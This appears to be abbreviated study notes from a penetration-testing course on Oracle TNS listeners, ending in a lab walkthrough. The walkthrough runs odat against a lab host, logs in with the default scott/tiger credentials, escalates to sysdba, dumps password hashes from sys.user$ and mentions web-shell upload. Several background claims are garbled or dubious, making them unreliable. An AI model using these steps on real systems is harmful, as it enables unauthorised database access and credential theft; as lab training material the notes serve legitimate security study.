A protocol that facilitates comm bet Oracle DB's/apps over networks
TNS supports various protocols bet client apps, such as IPX/SPX and TCP/IP protocol stacks
It has become a solution for large, complex db's healthcare, finance, and retail industries
Its built-in encryption mechanism ensures the sec of data transmitted
Ideal solution for enterprise envs where data sec is paramount
TNS now has support IPv6/SSL/TLS encryption which makes suitable for the following:
Name resolution, Connection management, Load balancing, Security Default Config
Default: The listener listens for incoming connections on port 1521
The TNS listener is config to support TCP/IP, UDP, IPX/SPX, and AppleTalk
Can support multiple network ints and listen on specific IP's
Default: Can be remotely managed in Oracle 8i/9i but not in 10g/11g
Security features of the listener:
Will only accept connections from auth hosts/basic auth using hostnames/IP's, usernames/passwds
Will use Oracle Net Services to encrypt comm bet client/server
Config files for Oracle TNS are called tnsnames.ora/listener.ora
Typically located in $ORACLE_HOME/network/admin dir
The plain text file contains config info for Oracle db instances/network services that use TNS TNS: Used with other services like DBSNMP, DB's, App Server, Enterprise Manager, Fusion Middleware, etc...
Oracle 9 has a default passwd, CHANGE_ON_INSTALL
Oracle 10 has no default password set
Oracle DBSNMP service also uses a default password, dbsnmp
Many orgs use finger with Oracle, which can put it at risk/make it vuln when we have the home dir Tnsnames.ora
Oracle Net Services software uses tnsnames.ora to resolve service names to network addresses
Listener process uses listener.ora to determine services it should listen to/behavior of the listener
Oracle db's can be protected by using PlsqlExclusionList: PL/SQL Exclusion List
User-created txt file that needs to be placed in $ORACLE_HOME/sqldeveloper dir
Contains the names of PL/SQL packages/types that should be excluded from exec
Once PL/SQL Exclusion List is created: It can be loaded into the db instance
It serves as a blacklist that can't be accessed through the Oracle App Server
connect_data # attributes of connection, service name, sid, protocol, db instance id
instance_name # name of db instance client
service_name # name of service client wants to connect to
security # security type for connections
connect_timeout # time limit in seconds for client to establish a connection to db
receive_timeout # time limit in seconds for client to receive a response from db
send_timeout # time limit in seconds for client to send request to db
sqlnet.expire_time # time limit in seconds for client to detect connection failed
trace_level # tracing for db connection
trace_directory # dir where trace files stored
trace_file_name # name of trace file
log_file # log info
Before we can enumerate the TNS listener and interact with it, we need to download a few packages and tools for our Pwnbox instance in case it does not have these already.
In Oracle RDBMS, a SID: System Id is a unique name that id's a particular db instance
It can have multiple instances, each with its own SID
Instance: A set of procs/mem structures that interact to manage the db's data
When a client connects to an Oracle db, it specifies the SID, with its connection str
The client uses this SID to id which db instance it wants to connect to
If not specified: The default value defined in the tnsnames.ora file is used
The SIDs are an essential part of the connection process, as it identifies the specific instance of the database the client wants to connect to. If the client specifies an incorrect SID, the connection attempt will fail. Database administrators can use the SID to monitor and manage the individual instances of a database. For example, they can start, stop, or restart an instance, adjust its memory allocation or other configuration parameters, and monitor its performance using tools like Oracle Enterprise Manager.
There are various ways to enumerate, or better said, guess SIDs. Therefore we can use tools like nmap, hydra, odat, and others. Let us use nmap first.
We can use odat.py to perform a variety of scans to for info about Oracle db services/components
Scans can retrieve db names, ver, running procs, user accts, vulns, misconfigs, etc. ODAT
./odat.py all -s 10.129.204.235
In this example, we found valid creds for scott and his password tiger
Now we can use the tool sqlplus to connect to the Oracle db/interact with it SQLplus - Log In
sqlplus scott/tiger@10.129.204.235/XE
SQL*Plus: Release 21.0.0.0.0 - Production on Mon Mar 6 11:19:21 2023
Version 21.4.0.0.0
Copyright (c) 1982, 2021, Oracle. All rights reserved.
SQL>
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
We can list all available tables in the current db/show us privs of the current user: Oracle RDBMS - Interaction
SQL> select table_name from all_tables;
TABLE_NAME
------------------------------
DUAL
SYSTEM_PRIVILEGE_MAP
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO
scott has no admin privs
We can try using this acct to log in as Sys Db Admin (sysdba), giving us higher privs Oracle RDBMS - Db Enum
sqlplus scott/tiger@10.129.204.235/XE as sysdba
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS ADM_PARALLEL_EXECUTE_TASK YES YES NO
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS DELETE_CATALOG_ROLE YES YES NO
SYS EXECUTE_CATALOG_ROLE YES YES NO
SQL> select name, password from sys.user$;
# we can retrieve password hashes from sys.user$ and try to crack them offline
Another option is to upload a web shell to target Default Paths:
If you come across the following error: sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory, please exec below, taken from
